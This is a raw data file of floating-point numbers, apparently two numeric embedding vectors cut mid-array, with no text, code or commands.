-0.007478634,0.0048398506,-0.02495706,-0.008321619,-0.0001720988,0.0042719916,-0.015991628,0.041150175,-0.012943658,0.008266744,-0.009644842,-0.013292509,0.0014870174,-0.0023749175,0.013847459,0.00030139147,-0.004479112,-0.009985823,-0.025851695,-0.0031483795,-0.0060036667,-0.0026594126,0.0004214729,0.021164192,-0.0020812976,-0.004352513,-0.019570876,0.013579156,0.004768974,0.009982585,-0.0101615675,0.0055104685,-0.025594601,-0.0026789992,0.006967658,0.0048097516,-0.013509544,0.033547364,0.0022787252,0.0138365505,0.016276507,0.014846608,-0.022513246,0.008164477,-0.024460802,0.021307303,0.0065216823,-0.004755441,0.00701036,-0.01175706,-0.004016567,-0.030121403,-0.0074610016,0.0012643086,-0.00031285232,-0.0034138777,0.0015690174,-0.0142338285,-0.008356561,-0.019121375,0.008869073,0.004341149,-0.016896741,-0.013443865,0.0067959083,-0.0011089352,0.027537754,0.0071537495,-0.0055762185,0.0034790686,0.012519806,-0.014017556,0.0013129342,0.00503008,-0.03279288,0.0030118723,-0.0053935023,-0.015916884,0.0042243265,0.006241265,-0.010145034,-0.0033558216,-0.008881227,-0.0006902829,0.0055110813,0.012051161,0.014048793,0.007557632,0.002592619,0.0047006365,0.014332181,-0.01317338,-0.0040395516,0.016381133,0.0121796625,0.038161613,0.0041609923,0.020865006,0.016889486,-0.0023030706,-0.020068547,0.0016042017,0.028054846,0.0015840171,0.009787498,0.005435896,-0.0054225596,0.0032903815,-0.0036256337,-0.0054266136,-0.0065250564,0.00839603,0.0029621464,0.01363346,-0.009019157,-0.0112793585,0.01178707,-0.02107211,-0.005458067,0.03534848,0.011181989,0.005772318,-0.011727307,0.002398947,0.0040496285,0.0073891305,0.018055793,0.008974442,-0.00836558,-0.032159444,-0.0016077748,0.005250218,0.01532612,0.012785001,-0.015336043,-0.0051180865,0.017209066,-0.0028713627,0.0012150701,-0.009020921,0.0065470147,-0.020297958,-0.007596394,0.023845904,0.0021958381,0.007221638,-0.0036567724,-0.0009847701,0.002466261,-0.0018733126,-0.01086,0.003217982,0.001579109,0.010856701,0.011052813,0.0015319296,-0.0035474845,0.0036997902,0.0047228914,0.0011123192,0.011300704,-0.0042408714,0.0045513664,-0.0053930786,0.002223838,0.0029058976,0.0022573182,0.0065085143,0.009646487,-0.00470628,-0.003705202,-0.0071598818,-0.008688655,0.00036613925,0.029489141,-0.0081048645,-0.0059093074,-0.009518527,-0.023096656,0.0053298334,-0.0041445815,0.0044952556,-0.019377876,-0.023735017,-0.0056381426,-0.016215933,-0.00005684961,0.013294932,-0.000008777676,0.007109587,-0.013169089,0.017602071,0.005484119,-0.009418768,-0.024066761,0.0002833867,-0.007816959,0.007001575,-0.005303251,-0.021952096,0.0048682042,-0.016401866,0.022112248,-0.008059252,-0.010865342,-0.009353654,0.0015385143,0.00037492785,-0.00956984,-0.0026605348,0.00018995207,-0.005787273,-0.001478533,0.017059285,0.009682935,-0.013661755,0.009153525,-0.0031008571,0.003094586,-0.0011835371,-0.005464068,0.01553622,-0.022749094,-0.01802419,-0.0064256075,0.0020313046,-0.018397886,-0.008945371,-0.007318195,0.006397006,-0.0024049955,0.019597879,0.002780204,-0.017212642,-0.02028616,-0.0017079335,0.007140697,-0.016354574,-0.02460144,-0.0030437824,0.023771895,-0.006232679,0.0053333235,-0.009039327,0.020518353,0.020673143,0.0018169138,0.0029624593,0.02339287,-0.02032032,0.0044983686,0.011031229,-0.0021337082,-0.012459403,-0.011845606,0.015616302,0.030429421,0.015706921,0.0056406897,0.00067708135,0.0034686935,-0.009748941,0.0049311784,-0.0116178505,0.019944066,-0.007406007,0.008216868,0.004060615,-0.017861668,-0.010461505,-0.008296871,0.025171643,0.020251608,0.0037742243,-0.016842036,-0.01655997,0.0063127237,0.0053814077,-0.028278202,0.006241305,-0.009335455,0.0013668524,-0.0016023954,-0.00196371,-0.0011209724,0.007507983,-0.0135669,0.006998197,-0.0049959426,-0.01577345,-0.018812686,-0.006664319,-0.0075623225,-0.084027044,0.02542201,0.024597803,-0.01427139,0.01639288,0.0062292283,-0.026119722,-0.00030130008,-0.017045898,-0.008466862,-0.0055608214,-0.01334326,-0.0045910794,0.015741982,0.00276032,-0.0076589426,-0.000871743,0.013273103,0.021585329,0.005248625,0.0032130664,0.024537899,0.030025028,0.0017700363,0.022905793,-0.0058832355,0.00019064089,0.01053821,0.015771305,0.00017446812,-0.0073098415,-0.009933985,-0.008938329,-0.018898442,-0.01669158,0.0049305093,-0.014878947,0.0052022324,0.006799225,-0.02837908,-0.021896638,-0.003270899,0.022749703,-0.016182266,0.0036350777,0.009226049,-0.022704287,-0.020535925,-0.041913107,-0.0042182775,0.024456447,0.0004544031,-0.012751967,0.004653034,0.0056110197,0.013735251,-0.0035800512,-0.0048917136,0.02337222,0.005378454,-0.023355559,-0.00269487,0.0141773075,0.0043346016,0.0036680866,-0.0049211276,-0.01146271,0.019069737,-0.026922379,0.006588753,0.012339164,-0.008211415,-0.016387414,-0.029800365,0.0042558555,-0.0042993072,-0.031569883,-0.008321922,0.011692609,0.015117644,0.007043232,0.0062132906,0.00869535,0.0031943351,-0.010684203,-0.0023116472,-0.0011775729,0.005027814,0.018831063,-0.0062484737,0.0008453252,0.00945243,-0.010485661,0.018393354,-0.0015529224,0.021800157,-0.021867245,-0.0032180115,0.010791512,0.018907225,-0.009995614,-0.0046793427,-0.0074251895,0.009877774,-0.00809628,-0.012293069,-0.02101256,-0.0058876486,0.0010190587,0.0023173578,0.0027915402,0.0067632208,-0.0002494546,-0.000044350945,0.021860367,0.008134596,-0.009577447,0.020350043,-0.0068842596,0.017793702,-0.004825824,-0.016303102,-0.016877545,0.0029569678,-0.00697497,0.002258428,0.022327729,-0.010926964,-0.0070414813,0.013046117,-0.023954682,0.014698021,0.01725188,0.03329425,-0.006377469,0.023258455,-0.002270669,-0.005889751,-0.023342477,-0.00638712,0.0013957022,-0.0074467673,0.020763421,0.00985522,-0.011519743,0.045770288,-0.02520731,-0.018382074,-0.00019036625,0.0048409025,0.0258539,-0.022171726,0.038584415,0.017353373,0.01118456,0.0060623144,0.018812578,-0.00085931155,-0.002161852,-0.003773551,-0.0052550947,-0.007799118,-0.022772929,-0.004018978,-0.021630026,0.010958754,0.020833265,0.014357938,-0.0060480246,-0.019246893,0.0014997027,-0.0007538918,-0.006077856,-0.008668204,-0.014284428,0.009591538,0.0031098558,0.002610394,-0.00032432625,-0.022664739,-0.006755758,0.0066717598,-0.0024033263,0.013921594,-0.02312563,-0.001720395,-0.0031407853,-0.018343907,-0.015583511,-0.0031061503,-0.003646932,-0.008605857,-0.00051243434,-0.0032397937,-0.021906093,-0.015804803,0.017380675,-0.002662936,0.01566263,0.025375266,-0.009168021,0.0061495327,0.02245219,0.0027020394,0.03297134,0.021522788,0.0009864772,0.008165933,0.0073578907,0.0021473754,-0.005781292,-0.019472592,-0.004083905,0.07785429,0.013989847,0.00848721,0.0113263065,-0.002344372,0.003158726,0.02288812,0.0015625544,0.022054557,0.024613595,0.0101991305,0.0047053304,-0.006860717,-0.011403145,-0.017009981,0.028337317,-0.0024509737,0.018518195,0.0016804656,-0.0072396593,0.02420678,0.00708925,0.0015973316,-0.026479319,-0.012558928,-0.064008355,0.00038645946,0.035415374,-0.01128986,0.0003930308,0.0076084873,0.021522481,0.023371339,0.010877407,-0.020230392,-0.008712057,0.02141886,0.009256911,-0.013525181,-0.007520097,0.01529896,0.021057239,-0.0034361086,-0.009181716,-0.0024690442,0.01110328,0.0013009922,-0.015845079,0.00446098,-0.0028798196,0.0084060505,0.011594545,-0.01124738,0.0049693095,-0.013007205,-0.017738422,-0.013515908,-0.013325088,-0.001431959,0.007848908,0.013574147,-0.037858274,0.0065537975,0.010316996,0.0097122295,0.0008437424,-0.023859577,0.0070122667,-0.04955707,-0.03890083,0.015852472,-0.023825338,0.009318073,0.018794319,-0.02188704,0.007812131,-0.00764266,-0.014145147,0.010077507,-0.013341166,-0.00397638,0.029481124,-0.011311345,0.015758002,0.0072338264,0.027227353,0.0064792987,0.002899737,-0.006888423,0.019186843,0.012663929,0.010465099,0.0012243519,-0.020703135,-0.013188645,0.0029386939,0.035424665,-0.020088162,0.0039403713,0.010749822,-0.020756776,0.005377753,0.004423196,-0.008447365,-0.023833778,-0.027232444,0.0067423307,0.039920494,-0.0015304468,0.007397167,-0.023625275,0.02567071,-0.013074137,0.011057946,-0.0034046127,0.0058845603,-0.0056704218,-0.014664182,0.011734794,-0.014082579,0.0017154058,0.01758563,0.01219301,0.017931934,-0.019459318,0.0014350489,-0.0022362573,0.012543369,0.00042246582,-0.0058584795,-0.0010611856,-0.032369055,-0.016495178,0.0046513965,-0.002455353,-0.0010328249,0.027602999,0.016878355,-0.0017949167,0.015190848,0.0065309815,-0.0010995938,-0.015167163,0.000058081398,0.0035236806,-0.010793822,0.021184111,0.011460789,0.0052208183,0.009601778,0.0020979852,0.009564356,-0.0009850684,-0.0007595854,-0.013872821,-0.019401304,-0.00509207,-0.0070110117,-0.00913513,-0.013514908,0.023990532,0.00020049098,0.017218592,-0.022705058,0.0034410602,0.0040377346,0.022567233,0.009708691,0.00024955536,0.0026266633,-0.0031317482,-0.008275383,-0.0013734034,0.028175643,0.005530741,-0.013475317,0.022094663,-0.0031836152,-0.018048119,0.0042201746,0.0072888774,0.021934647,-0.016392147,0.023275144,0.00031939056,-0.012964978,-0.018623564,0.012563485,0.005313993,0.03284936,-0.005527107,0.013046759,0.005586852,0.014262192,0.0045022178,0.0041048783,-0.017491583,0.052458268,-0.014936573,-0.035941325,0.00070439454,-0.0052051325,-0.005101333,-0.012658005,0.0063311392,-0.015857583,-0.0090136975,0.005677782,-0.017619427,-0.012037404,0.007850203,0.005154097,0.01915883,-0.008147714,-0.008495994,-0.0009560557,-0.0157581,-0.004430003,-0.02151173,0.010396717,0.009305097,-0.02036294,-0.030697608,0.0155152725,0.0026037593,-0.024614872,0.014701693,0.029814132,0.015747616,-0.020624943,-0.014592273,0.022469044,-0.0023084357,-0.0058694524,0.0021343792,-0.00992227,0.015382542,0.016332848,-0.02108284,0.01625963,0.011848834,-0.003217226,0.0042232773,0.004049398,-0.006761489,-0.00032160003,-0.0026658366,0.010605145,-0.021343004,-0.04392126,-0.030127058,-0.0021331706,-0.012963063,-0.0057419376,-0.008755825,-0.005056934,-0.011891693,0.014664176,0.026016317,-0.015111061,-0.0001173219,-0.00350442,0.010609406,0.015760696,-0.01412875,-0.007532074,0.022129215,-0.014218441,-0.022951413,-0.002902532,-0.007957801,-0.015469759,-0.017790021,-0.026075687,-0.0085373325,-0.0037766933,-0.01712713,-0.010539211,-0.015537774,0.004355996,-0.0014195859,-0.0074958582,0.01574773,-0.005475171,0.015793912,0.005312865,0.03759188,-0.0012083235,0.030008914,-0.053418186,-0.0006055887,0.0126552405,-0.010900524,-0.01238042,0.033590905,-0.011096312,-0.13673769,-0.027482873,0.037248477,0.017011065,-0.040740162,-0.010222837,0.017892117,0.0046431897,-0.034378275,0.012132654,0.017455649,0.017341835,-0.009377815,0.019252187,0.012608654,0.0011010248,-0.01014129,0.008087989,-0.002967883,-0.011731401,0.0063688406,0.022257654,0.0032090128,0.0021767467,0.024660911,-0.038481176,-0.0030353472,0.0013745665,0.0138046695,-0.004823952,0.015573557,-0.019124342,-0.016291441,-0.016081847,0.0067679808,-0.006877433,0.0045634424,0.0014151344,-0.0070781824,0.011595971,-0.0026121847,0.17687763,0.0057291244,-0.024178868,-0.025536845,0.008958992,-0.035051327,-0.016068207,0.022487642,0.019354476,-0.01047526,-0.0021592388,-0.00029245557,0.01602017,0.007214615,0.015461542,-0.01808435,0.01721179,0.157034,0.0028088014,-0.0020600946,0.0064781667,-0.013145951,0.029272983,0.022857262,-0.002567772,-0.06013649,-0.009049778,-0.0289711,0.011720139,-0.0140747875,0.011331234,0.019329282,-0.013728009,-0.00014550364,-0.027324209,0.0042703627,-0.0056419126,-0.0076323156,-0.034963224,0.028808346,0.008203389,0.0077676727,-0.012976522,0.0007762854,0.0064219707,0.0046837325,0.005598174,-0.001668901,0.018895853,0.025126275,0.008329789,0.009940607,-0.004184965,-0.018736625,0.0026641944,0.013308845,-0.022696344,-0.022412311,-0.0015794531,0.022188535,0.015061217,0.011648453,0.0029141048,0.016903425,-0.01982611,0.011157641,0.004866898,0.0011820231,-0.016826656,-0.005752067,-0.020763073,0.021789942,-0.028817553,0.028718483,-0.014488636,-0.010407621,-0.023236353,-0.030220896,0.0139370505,-0.021529274,0.0043204078,0.019406695,-0.013927628,-0.006351222,0.0027957326,0.018672742,-0.016984502,0.035887472,-0.0035129841,-0.0024450347,0.0017019599,-0.00047061185,-0.00062953663,-0.012535564,-0.009052254,0.0156972,-0.028101377,0.010370153,-0.00056069606,0.002564327,-0.01981638,0.021598136,0.002587205,0.019973917,-0.020892873,-0.017353175,-0.00975382,-0.0036218076,0.008349008,0.0036158068,0.009738965,0.025436765,-0.015547043,0.03142772,-0.025164342,-0.01382682,0.012125677,-0.001029921,-0.029964812,0.010832981,-0.0045990637,-0.011037799,0.023069758,-0.0017465664,-0.051149618,0.006885694,0.0013293696,0.020775566,-0.013877682,-0.0037657334,-0.03047607,-0.0041228794,-0.0011538739,0.02881757,0.005347647,-0.0073732515,0.01867503,-0.03145077,-0.00095165975,-0.027888913,0.0028285587,0.022774398,-0.004903616,0.025523469,0.0066651483,0.006549996,0.003848149,0.025465546],[0.020818587,-0.00048342434,0.008936744,-0.020138258,0.00007261626,-0.0112993205,0.0080566965,0.0063882265,0.009299188,0.009833963,0.008448517,0.032998364,0.01728215,0.016551618,-0.0050561014,0.00143949,-0.0049406416,0.0022171347,-0.0031152633,-0.008484182,0.0021143605,-0.014654914,0.018084494,-0.0032388028,0.022028157,0.02511652,0.0109272115,-0.01174985,0.00048196022,-0.01192854,0.010144551,0.031986386,-0.006529513,0.016091943,0.013417001,0.028479628,0.0025844616,0.0049053733,0.0041653346,-0.021910654,0.011365705,0.018377947,-0.010734488,0.02170639,-0.003800306,-0.010591125,-0.0023889833,-0.012447538,-0.010450733,0.020920705,-0.0019023207,0.008153135,0.003311738,0.006964251,-0.0018525904,0.006579879,-0.01619371,-0.031056788,0.024944518,-0.013991716,-0.0001467905,0.013781084,-0.0011217409,-0.0043488317,0.042271353,-0.009676132,0.008421622,-0.0035469206,0.005511814,0.0015415455,0.031934604,0.003058654,0.009449629,-0.0030070439,-0.0044417055,0.0072944616,-0.003926297,0.007381119,0.0039282297,-0.0032002963,-0.03682677,-0.003910342,0.016026868,-0.0018507512,0.018120771,-0.007366423,-0.0072306762,-0.014436365,0.006019227,-0.009353978,-0.011857729,0.0101346,0.0035018525,0.0043857642,-0.0024688814,0.014287478,0.009141128,0.018398412,-0.02283744,-0.018334892,-0.010526232,-0.011130541,-0.022925233,0.014484738,0.002178699,0.010048663,-0.01212195,0.006973461,0.009079118,0.0063814986,-0.0023316909,0.0055555045,0.006810673,0.00788774,-0.0075362707,-0.0036971064,0.008386603,0.0114857005,-0.01012235,0.0041401307,0.018383704,-0.00026416767,-0.0033418373,0.0021448657,-0.01287964,-0.0007788386,-0.009521693,0.011271064,-0.0151190795,-0.019651448,-0.020908026,0.010895986,-0.010866001,-0.0017947169,0.00024441665,-0.007967273,0.0057285493,-0.0010085036,0.010550216,-0.017616173,0.03220545,0.009914867,0.028779332,0.022953503,0.004874223,-0.0008332227,-0.0032279396,0.017558753,0.019091763,-0.012811837,-0.0013318137,0.00035035991,-0.0038016825,-0.003817793,0.0021923967,0.008875642,-0.02512146,-0.014771697,0.0049246303,0.004777216,0.0065369583,-0.009121018,-0.011914279,0.018188966,-0.005083213,0.01750912,-0.013857355,0.014145074,-0.020332234,0.0019909104,0.007318909,0.0068972134,-0.0044911914,-0.027920853,-0.006571612,-0.020126916,0.011134984,0.001021864,0.005899525,0.05088564,-0.02095434,0.022792637,-0.0025389246,-0.008671654,0.007507273,0.025434153,0.009725874,0.017904505,0.0009291654,0.005151573,0.008700259,0.0023931302,-0.017534278,0.01289325,-0.0031385578,-0.022586133,-0.020074418,0.074531876,-0.0018478823,-0.010879973,0.011108988,-0.007014904,-0.009172127,0.004564275,-0.023378469,0.00022565018,-0.024736868,0.00079843256,0.0043559903,-0.016321514,0.013948797,0.010584299,0.013795389,0.004649821,0.019806454,-0.10027662,0.006564594,0.009575521,-0.013559903,0.011070307,0.0039736982,0.0000611517,-0.02492441,0.009907057,-0.019560495,0.009898684,0.020109648,-0.00758777,-0.011342756,-0.030607337,0.018091029,0.020796016,-0.02350215,-0.00103519,-0.013126753,-0.030152678,0.0020060223,0.004050284,0.00097164337,-0.008386414,-0.025902204,-0.0045578806,0.01855899,0.006815051,-0.008600603,-0.003932666,0.0040887743,0.010036741,-0.003415566,0.0006278332,-0.016101377,-0.028113158,0.00443143,0.03346988,0.005771211,-0.015861137,0.0070688906,-0.00086883653,0.015305178,-0.0018470949,0.006115909,0.022129009,-0.013873836,0.0057293717,0.032305427,0.008028701,0.011535603,-0.02651773,-0.0059518805,-0.002553821,-0.05448596,-0.0040731803,0.00683454,-0.021497859,0.017938912,0.0111008845,0.0088817105,-0.007032244,-0.011077422,0.0012488603,-0.007584195,-0.006324909,-0.020371696,-0.004519529,-0.011177709,-0.0075630937,0.022761233,0.006922774,0.021244848,0.024063652,-0.009195709,0.004822109,0.04004675,0.0055805393,-0.018528452,-0.011430132,-0.032451946,0.02175895,0.01536434,-0.013233603,-0.001971925,-0.020238562,0.012544726,-0.02947928,0.0052157193,-0.012168694,-0.0060626874,0.0005745932,0.009106917,0.008107132,-0.0075927717,-0.0089115705,-0.0058492725,0.0049647074,0.00007184502,0.034859788,-0.03075346,-0.020955862,0.0074136076,-0.008058154,0.012093566,-0.0013671082,0.0030316804,-0.0020400905,-0.013580356,-0.011604818,0.0104254335,-0.0037431628,0.0032034821,0.01689845,-0.004104601,0.004708875,0.022726007,0.01758895,-0.05035011,0.013425679,-0.006140269,0.02732323,0.00076311093,0.05215867,0.007476456,-0.005421086,-0.018227804,0.009519477,-0.005091132,0.015082368,-0.0032653764,-0.013447453,0.02064497,-0.025867105,-0.007618373,0.011449304,-0.0070024487,-0.00040540815,-0.004883471,-0.027817866,-0.0070031323,-0.007322381,-0.019241987,0.0086374665,0.0304334,-0.012272107,0.014965899,-0.005508204,0.058450215,0.015928883,-0.009701217,0.0052373195,0.0018279674,-0.006843656,0.029172273,-0.0008166624,0.0018479911,-0.0135735115,-0.013815568,-0.023143634,-0.014699401,0.037949182,-0.018658252,0.00052741676,-0.016398523,-0.0036029494,-0.019227235,-0.020619048,0.018081773,-0.0038047526,-0.018033063,0.011929338,0.007515677,0.021972261,-0.008423812,-0.022723584,-0.0017926089,-0.0053705256,-0.0061332295,0.0012300501,0.0036908048,-0.0015393394,-0.005485041,0.022070933,0.008807041,-0.00081626035,-0.0007967092,0.012719382,-0.010980193,0.0011609549,0.0070533277,0.01552272,-0.025796784,0.014390266,0.015612554,-0.009964385,-0.014773013,0.014982686,0.0027481639,0.00940902,-0.031512644,0.01984232,-0.023745023,0.0061638667,0.025523001,-0.020839794,0.0025725078,0.016673854,0.031751916,0.025283922,-0.018391464,0.024833793,0.0021578425,0.029002067,-0.006320692,0.0065632914,-0.011155219,-0.012834391,-0.003915169,0.017771613,-0.0092764115,0.0005699686,0.0016117241,-0.0033429132,0.015192999,-0.037128847,0.0051126424,0.049559366,0.00092970155,0.01851838,-0.004707043,-0.0010794547,-0.033668432,-0.0034203832,0.0067979833,-0.0043860893,0.0055030216,-0.014362382,0.0051533603,-0.007463827,0.013185867,-0.019150997,0.018880142,0.0038713822,0.025271278,-0.023381045,-0.0019041783,0.0004110844,-0.018762145,-0.0060344273,0.0024367997,-0.003481274,-0.0048022578,-0.010602138,0.0016650038,-0.018755583,0.0026971211,0.027262291,-0.011597958,-0.0021560676,-0.005666313,0.0012295292,0.0051526055,0.0014001079,-0.004883578,0.0054598083,-0.013108605,0.027269334,0.008947492,-0.013754995,-0.008633612,0.0060339295,-0.019243311,0.008535669,0.0037187827,-0.015415486,0.011441577,0.017826032,-0.0052312356,0.020298934,0.011216041,-0.034497038,-0.006350759,0.0031076788,0.008644998,-0.010431281,0.034021445,0.0049834563,0.0096617285,-0.0046123816,0.02087644,0.016741296,-0.00049906556,0.01376221,-0.00085920125,-0.01605896,-0.016734896,-0.000050950403,-0.001582376,0.0013809298,0.012625398,-0.024474088,-0.0011796195,0.011387044,0.014804832,-0.0092312945,-0.025646854,-0.004403501,0.018560672,-0.026003191,0.0037624773,-0.0035838499,-0.00970908,-0.00045539904,0.016922018,0.07121598,0.009338305,-0.036757033,-0.018838042,0.000040480376,-0.004227788,-0.009075652,0.00015466819,-0.014990598,0.014206935,0.002791333,0.0014262813,-0.016770776,-0.0040015415,-0.016874744,-0.0068895533,0.016298179,-0.013933072,-0.018278938,0.0027359715,-0.008597944,-0.005643113,-0.017716179,-0.02409959,-0.019334354,-0.017570214,0.03403816,0.018509079,-0.004253915,-0.005508807,-0.022212991,0.006134514,-0.0006188924,0.00004682303,0.017054578,-0.017874423,0.00281436,-0.0020793786,-0.01444973,0.03678635,0.0080529675,-0.0049248505,0.0113267675,0.018229831,-0.010708945,-0.00814692,-0.004906052,0.002264898,0.002510592,0.016134758,-0.025672324,0.006602877,-0.0015603885,0.00812903,0.013785882,-0.009883504,0.013347455,0.013003145,-0.0016383651,0.008676743,0.023400227,0.020886224,-0.020204714,-0.028566798,-0.0028212322,0.008488121,0.01579238,-0.007965219,0.003985769,-0.032837685,0.016171755,0.003962226,0.012043471,0.015630897,0.011785449,0.0033570947,0.005181791,0.02386334,0.026779896,-0.0039509814,-0.006914189,0.021390203,-0.0045111557,-0.011287814,-0.004883703,-0.006461317,0.0023273495,0.020640241,0.020213189,-0.030172778,0.011463216,0.0026567394,0.0035045503,0.00520034,0.018107114,0.00042150152,-0.0042314692,0.0032487677,0.0019649202,0.0068368865,0.0017525784,-0.027797444,-0.0034990932,0.050681725,-0.0021570546,0.01603329,0.005656909,-0.019938761,0.018571945,-0.011537345,-0.00965748,-0.07474523,0.008881213,0.036715664,0.0074458574,-0.007032073,0.038800947,-0.017363973,0.0061151804,0.000030273639,-0.008999538,-0.0074032396,-0.0052561457,-0.0050406517,0.013193608,0.018647084,0.015480325,-0.011506822,-0.016796658,-0.0067446604,-0.0512088,0.010315035,0.013503415,-0.010705288,0.0065452047,0.007752735,0.0013067186,-0.010710599,0.013179038,0.015027363,-0.00072152144,0.0048836917,0.017846823,-0.011860267,0.004269091,-0.018640142,0.008515682,-0.006074268,0.0011972875,-0.0077072186,-0.020988503,0.026733922,-0.016342668,-0.01945494,-0.010489789,-0.0033798448,0.022367135,-0.011943064,0.018957417,-0.0036970088,0.015482914,-0.012197789,-0.00011317074,0.02067055,-0.0052807205,-0.0041373284,0.006750426,-0.00959063,0.018135048,0.0072148363,-0.0015036303,0.007000527,0.020757698,0.01029566,-0.00155156,-0.0038635926,0.01335279,0.012498762,0.009469704,-0.0054396647,-0.0027774519,-0.007807679,0.012131781,0.0061793434,0.014980958,0.0072139017,0.017385878,-0.0002303746,0.0072863847,0.012301529,0.0058292537,0.021662595,-0.027585478,-0.016431108,0.020760497,-0.0078024464,-0.0051190383,0.017958857,-0.0011268652,-0.0013221541,-0.023843132,-0.026243048,-0.022219343,-0.014359082,-0.0011223226,0.0025921424,0.006392134,-0.007188857,-0.032841817,-0.020768201,0.017421933,0.028423328,-0.017892351,-0.018108761,-0.004787898,0.001215843,0.0014277864,-0.025430903,-0.030309482,-0.005034018,0.029092306,-0.0282819,0.016290603,0.015158851,-0.0071038064,0.0082764905,0.022273783,-0.01614733,-0.0020761364,0.0045149177,-0.0055409847,0.025480377,0.037961088,0.018675076,0.00013609082,-0.008486936,0.0057796,-0.014059469,-0.016341237,0.0033881105,0.009903402,0.020208169,0.012014225,-0.019845987,0.01599192,-0.0077093346,-0.018701227,0.020180248,-0.01673775,-0.018706914,0.0046640923,-0.0057083326,0.0015090825,-0.006961341,-0.024014702,0.024127012,0.016272528,-0.014467508,0.008400479,-0.010486933,0.02519518,0.013244143,0.0143002635,-0.028586924,-0.01494087,-0.028171824,0.01659754,-0.0058256453,-0.0032487933,-0.015391758,-0.009415672,-0.0071813264,-0.021659944,0.008425101,-0.016678313,-0.0023190787,-0.0018156106,-0.040026944,0.011345034,0.0077710617,0.013638188,0.00030520518,-0.002535001,-0.022855641,-0.009833182,-0.0015663634,-0.0350067,-0.028609369,0.014294554,-0.004055162,-0.028596172,0.0048625157,-0.029939752,-0.018249286,-0.009214791,0.0072765765,0.0013501161,0.025416112,-0.014471848,0.01715823,-0.018814364,-0.019159447,0.0048163584,0.020018933,-0.039426316,0.00455374,-0.000064348904,0.005710215,0.015931264,-0.004462492,-0.007835816,0.015992336,0.0114795305,-0.03415204,0.022131566,0.0073621287,-0.013633212,-0.019587154,-0.005380984,-0.010375415,-0.017305357,0.014359669,-0.011915005,0.009069168,0.0006630547,-0.0071293246,0.0096484935,0.007354343,-0.020228935,-0.011577792,0.0009599229,-0.0030759112,-0.01011554,-0.017830582,0.010240325,-0.008914532,-0.004245836,-0.00024970094,0.029057229,-0.00023723092,0.0005072911,-0.0027705925,-0.0041034864,-0.0061258394,-0.020034013,0.002305403,-0.003618771,-0.00008563494,-0.0067932783,-0.00023959503,0.021088894,0.015078007,0.011355186,-0.02072293,-0.008049591,-0.0005257419,-0.00046991365,0.005058984,-0.021378616,-0.02243089,-0.02481968,0.014263395,-0.0375253,0.004703373,-0.01688142,0.022143822,0.0036331315,-0.036807127,-0.013005191,0.0025211405,-0.006985032,0.02743433,0.0028655203,0.0026322948,-0.0028360593,0.016927585,-0.007555388,0.008316094,-0.014435813,-0.0030545886,0.014426625,0.00409998,0.014676577,-0.0113546,0.016247056,0.0014070191,-0.015329454,-0.017738534,-0.01885605,0.026336158,0.010323941,-0.024102414,0.020336578,0.00733882,-0.03873409,0.0018430569,-0.03121004,-0.015068044,0.025308387,0.0034015684,0.035354417,-0.014293585,0.019155225,0.0025080536,-0.02460463,0.0147204455,0.008675612,-0.04458434,0.051831827,0.02413528,-0.023260888,-0.014147854,0.0036070417,-0.016796282,-0.0027097594,0.037843607,-0.003990582,0.0025448753,-0.009917954,0.017126447,-0.006958882,0.0016513144,-0.019613324,-0.020219408,0.021528024,0.006868066,-0.012088619,0.011672739,0.0110622095,0.013651267,-0.006417345,0.016876971,-0.0109697515,0.0039009093,0.0017047188,-0.0039961054,0.027286688,0.008554618,0.027271003,0.0011321461,-0.008577124,-0.017010685,-0.02497014,0.015355533,-0.0010574729,-0.011359303,-0.0026093188,-0.011632211,0.018452575,-0.011521587,0.029367946,-0.0021604565,-0.024559317,0.0071092383,-0.01054386,-0.015492351,-0.024551895,0.016467996,0.00002471724,-0.0018027719,0.013526094,0.021144407,0.0059025763,0.012841971,-0.010711246,0.0015785587,-0.0014977562,0.013679347,-0.0020099266,-0.005370116,0.028734436,-0.015089237,-0.009032987,0.0107252365,-0.019611998,0.014752511,-0.014291157,0.016624665,0.0018519834,-0.009590847,0.015191322,-0.02421031,0.0273689,0.00018054356,-0.015476301,-0.0077653276,0.0011885887,-0.0035665662,-0.0016085182,-0.030452432,0.010319904,-0.010226772,-0.0059055653,0.01580403,0.0019092832,0.00076006446,-0.0019690725,-0.02545708,-0.028757159,-0.001994651,0.016639158,-0.0037655083,0.005777047,-0.014532765,0.028401108,0.007645686,-0.004432784,0.014874846,-0.0142538855,-0.028106254,0.0039706836,-0.0112735545,0.0010231963,-0.0066128443,-0.0041962825,0.023390943,0.024821723,0.009759961,-0.0017172784,-0.0023156963,0.013518983,0.0010169703,-0.019701729,-0.022591466,0.0013359664,0.07740636,-0.008954628,0.015352704,0.0044826227,-0.014121531,0.0028318327,-0.015631864,0.009771443,0.02530941,0.005830959,-0.018535206,0.00366429,-0.008567449,-0.0022972666,-0.0091156345,-0.003273171,0.027103504,0.008085394,-0.0074566877,0.0065673497,-0.003610119,0.009583966,0.006430891,-0.025649896,-0.03096813,-0.000042712818,-0.01185508,-0.002489883,-0.013070519,0.0033299134,0.005591291,0.0041689873,-0.010063078,-0.022012614,-0.0047983234,-0.026059432,-0.029840842,0.010203898,0.0010939816,-0.035135075,0.00049233757,0.025394885,-0.024531765,-0.008537816,0.007801605,-0.005154279,-0.010448533,-0.029456412,-0.015613907,0.00014057716,-0.009586083,0.0010484196,-0.0022255555,-0.0070308438,-0.022333132,0.017048921,0.00084289565,0.007795036,0.03777463,0.009451457,-0.007473825,-0.020893969,0.00422931,0.011838367,0.005022146,0.019889144,0.0245515,-0.0053641917,-0.006075468,0.0018453428,-0.018128466,-0.031747453,0.002650937,0.009895848,-0.00568208,-0.00094974006,0.0042746277,0.0027608664,-0.0020290432,0.009164651,-0.007803864,0.023083992,-0.018211968,0.006428275,0.007398136,-0.002599318,-0.005421282,0.0050838664,0.005432526,-0.025077041,-0.006180903,0.013479164,-0.0109153325,0.0072199,-0.0031196482,0.0047851484,-0.022833297,-0.026944779,-0.005799854,-0.00034230252,0.03628799,-0.038231008,0.006784293,0.018918315,-0.0053077536,-0.01683585,-0.00029482966,-0.008276626,0.036111783,0.0033497522,0.0006987636,0.0043848776,0.03159626,-0.035386257,0.050247677,-0.000068502326,-0.026525466,0.023593478,-0.017670264,0.007265959,-0.027773675,-0.03403972,0.0050644944,0.017834926,0.019938296,0.0058878544,0.008879866,0.016874785,0.0049255784,0.0004176192,-0.018871421,0.017935216,-0.0068772193,0.0033047579,-0.002655224,-0.007735058,-0.009761237,-0.0146732135,-0.008449724,-0.011271279,-0.022443514,0.0015251911,-0.0020850892,-0.008807649,-0.019303503,0.035731994,0.019606376,-0.0011781852,0.018082416,0.007914691,0.0054229335,-0.005024625,0.013596949,-0.008871657,